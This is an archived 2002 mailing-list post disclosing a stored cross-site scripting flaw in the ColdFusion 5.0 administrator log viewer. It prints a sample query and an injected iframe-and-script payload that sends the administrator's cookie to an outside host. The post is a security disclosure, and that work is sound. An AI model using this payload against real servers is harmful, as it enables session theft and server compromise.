Cross-site scripting vulnerability in CF 5.0

From: KiLL CoLe (killcoleat_private)
Date: Mon Dec 16 2002 - 10:16:15 PST

  • Next message: CORREIA, PATRICK: "RE: Cross-site scripting vulnerability in CF 5.0"

    Cross-site scripting vulnerability in CF 5.0.  This
    issue was brought up to macromedia on July 22nd, 2002.
    Macromedia issued a fix to me, but I have not seen the
    fix available to the public.  the coldfusion
    administrator allows you to view your application log
    via your web browser.  Under certain conditions, it is
    possible to remotely alter coldfusions application
    log.  take the following code:
    
    <CFQUERY NAME="qProducts" DATASOURCE="#datasrc#">
       SELECT * FROM Products
       Where ProductId = #int(url.productid)#
    </CFQUERY>
    
    if the INT function encounters a value that is not
    numeric, it throws an exception and writes the value
    that was passed to application.log. Should an
    unsuspecting administrator view the log file via their
    web browser, script could be executed.  Analyze this
    code:
    if url.productid (from the above example) were passed
    in as:
    
    <iframe name="frame1" width="0" height="0"></iframe>
    <script>document.frame1.location="http://www.domain.com/index.cfm?stealcookie="
    + document.cookie</script>
    
    this would enable an attacker to steal the value of
    the coldfusion administrators cookie.  Decrypting the
    coldfusion admin's password is well documented, and
    exposes a mild-moderate threat to server security.
    
    **NOTE: there are dozens of other functions that throw
    exceptions similar to the INT function.
    
    __________________________________________________
    Do you Yahoo!?
    Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
    http://mailplus.yahoo.com
    



    This archive was generated by hypermail 2b30 : Wed Dec 18 2002 - 17:46:32 PST